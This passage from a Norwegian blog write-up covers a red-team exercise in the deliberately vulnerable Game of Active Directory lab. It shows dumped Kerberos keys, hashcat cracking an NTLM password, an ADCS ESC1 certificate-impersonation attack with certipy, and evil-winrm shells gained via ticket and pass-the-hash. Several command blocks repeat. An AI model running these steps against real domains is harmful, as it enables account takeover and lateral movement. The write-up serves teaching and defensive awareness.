sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
MEEREEN$:aes256-cts-hmac-sha1-96:627947a08303ffc008bb8984ac96f0c760fc3d2e5eb862b11edbd3533a10c768
MEEREEN$:aes128-cts-hmac-sha1-96:5c196a34f9258e725b2cbc62c72ff5c0
MEEREEN$:des-cbc-md5:2fe97f46b9253864
BRAAVOS$:aes256-cts-hmac-sha1-96:8d4c7ad755d68b03af90cf6a3961a6b594f8c9ea20b6d3ee0a97895d028d7f8e
BRAAVOS$:aes128-cts-hmac-sha1-96:82cbe868cf91352bd7cd6f6f50feb6f1
BRAAVOS$:des-cbc-md5:86dfd964d35e0ed9
gmsaDragon$:aes256-cts-hmac-sha1-96:ac426a3d054ae8e74d015db42a6b22cb05b1940072665f973601a38f44f11571
gmsaDragon$:aes128-cts-hmac-sha1-96:7c121eb9123f679c1904fde4a979dc8b
gmsaDragon$:des-cbc-md5:706bf845f4f2df1f
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:f9a4c9931fdcfb0562e22ea9274ba2be42a4bc311bcde8b91864cb44e7ee3fd6
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:b9a00bf0a4e7757c89878238b03a020d
SEVENKINGDOMS$:des-cbc-md5:94a4b63edfb04938
[*] Cleaning up...

Igjen ser vi at vi har klart å hente ut hasher fra domenekontrolleren i essos.

Et ord om passordcracking

Vi kan også mate samtlige NTLM hasher hentet med secretsdump inn i hashcat, og kjøre den mot en passordliste som f.eks RockYou som vi gjorde tidligere, og vi får følgende resultater som viser at passordet til khal.drogo oppfinsomt nok er “horse”. Selv om dette ikke gir oss noen merverdi er dette for å illustrere poenget at vi kan bruke sårbare sertifikatmaler til å hente frem passord i klartekst i noen tilfeller.

hashcat -m 1000 creds/essos.dump.ntlm  /usr/share/wordlists/rockyou.txt --show
739120ebc4dd940310bc4bb5c9d37021:horse

$ cat creds/essos.dump.ntlm| grep 739                    
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::

hashcat -m 1000 creds/essos.dump.ntlm  /usr/share/wordlists/rockyou.txt --show
739120ebc4dd940310bc4bb5c9d37021:horse

$ cat creds/essos.dump.ntlm| grep 739                    
khal.drogo:1115:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::

ESC1

Det siste vi skal se på er ESC1 sårbarheten. Denne fremkommer når en tilgjengelig sertifikatmal er konfigurert til å kunne brukes til autentisering, ikke krefer noen godkjenning, og den som etterspør sertifikatet selv kan oppgi hvem sertifikatet skal gjelde for.

I dette tilfellet etterspør vi sertifikat på vegne av daenerys targaryen, men med khal.drogo sin passordpålogging.

$ certipy req -u khal.drogo  -p horse -ca ESSOS-CA -target braavos.essos.local -template ESC1 -upn daenerys.targaryen@essos.local
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'daenerys.targaryen@essos.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'daenerys.targaryen.pfx'
[*] Wrote certificate and private key to 'daenerys.targaryen.pfx'

$ certipy auth -pfx daenerys.targaryen.pfx -dc-ip 10.3.2.12
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'daenerys.targaryen@essos.local'
[*] Using principal: 'daenerys.targaryen@essos.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'daenerys.targaryen.ccache'
[*] Wrote credential cache to 'daenerys.targaryen.ccache'
[*] Trying to retrieve NT hash for 'daenerys.targaryen'
[*] Got hash for 'daenerys.targaryen@essos.local': aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a

$ certipy req -u khal.drogo  -p horse -ca ESSOS-CA -target braavos.essos.local -template ESC1 -upn [email protected]
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'daenerys.targaryen.pfx'
[*] Wrote certificate and private key to 'daenerys.targaryen.pfx'

$ certipy auth -pfx daenerys.targaryen.pfx -dc-ip 10.3.2.12
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'daenerys.targaryen.ccache'
[*] Wrote credential cache to 'daenerys.targaryen.ccache'
[*] Trying to retrieve NT hash for 'daenerys.targaryen'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a

Og vi kan enten bruke kerberos ticketen eller vi kan bruke NTLM hashen for den saks skyld.

Kerberos ticket:

$ evil-winrm -r essos.local -i meereen.essos.local
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> whoami
essos\daenerys.targaryen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> hostname
meereen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents>

$ evil-winrm -r essos.local -i meereen.essos.local
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> whoami
essos\daenerys.targaryen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> hostname
meereen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents>

NTLM hash:

$ evil-winrm -i meereen.essos.local -u daenerys.targaryen -H 34534854d33b398b66684072224bb47a
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                  
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> whoami
essos\daenerys.targaryen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> hostname
meereen

$ evil-winrm -i meereen.essos.local -u daenerys.targaryen -H 34534854d33b398b66684072224bb47a
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                                                  
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                             
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> whoami
essos\daenerys.targaryen
*Evil-WinRM* PS C:\Users\daenerys.targaryen\Documents> hostname
meereen

Refleksjon

Jeg håper disse tre eksemplene understreker hvor store sårbarheter man kan introdusere med feilkonfigurasjoner i ADCS. Det betyr ikke at ADCS i seg selv er sårbart, men det er fort gjort å introdusere våre egne feil dersom vi ikke setter dem opp med omhu. Jeg anbefaler på det sterkeste å lese SpecterOps sin fantastiske artikkel og medfølgende whitepaper “Certified Pre-Owned”.

Med dette konkluderer vi serien med inn legg om red-team aktiviteter i den bevisst sårbare labben Game of Active Directory, (laget og publisert av Orange CyberDefense) som jeg vil minne om at man selv kan sette opp i eget miljø for å leke med. Vi har på ingen måte vist alt som finnes av sårbarheter, ei heller kan jeg påstå at vi har vært spesielt opptatt av å gå stille i dørene. Her har vi brukt verktøy og metoder som skaper mye støy, og i neste serie skal jeg ta for meg hvordan man detekterer angrepene vi har tatt for oss, og hvordan man tetter sikkerhetshullene.

Målet med denne serien var å demonstrere med faktiske kommandoer, eksempler på hvordan trusselaktører kan ta seg metodisk gjennom miljøet ved å utnytte svake konfigurasjoner man finner underveis, helt til man har totalt eierskap over on-prem AD miljøet. Det er også verdt å merke seg at dersom man sitter med et hybrid-miljø med både on-prem Active Directory og også et Microsoft Entra skymiljø er det mulig at den ene kan bli en angrepsbane inn i den andre – som vi har sett skal det ikke mer enn et flatt nettverk eller et gjenbrukt passord til før man har forflyttet seg på tvers av sikkerhetsbarrierer.

Jeg håper det har vært lærerikt, og passe skremmende for teknikere der ute som sjonglerer oppgaver og drifter systemer på trange budsjett og på mystisk vis likevel klarer å holde skuta flytende. Kanskje dette kan være til nytte for å kartlegge sårbarheter slik at man kan gjøre noe med dem før uvedkommende gjør det. Jeg håper dere følger med videre på blueteam serien jeg skal opprette, og kanskje titter innom innimellom i fremtiden.

Inntil videre!

GoAD Write-up – Persistence, Escalation & Lateral Movement – Finale

Angrepsbaner

Angrepsbane #1 – ESC13

Rekognosering

Angrepsbane 2 – ESC8

Et ord om passordcracking

ESC1

Refleksjon

More posts

AD Herding: NTLM Del 1 – Bakgrunn og Teori

GoAD Write-up – Persistence, Escalation & Lateral Movement – Finale

GoAD Write-up – Persistence, Escalation & Lateral Movement Cross Forest.

GoAD Write-up – Persistence, Escalation & Lateral Movement fortsetter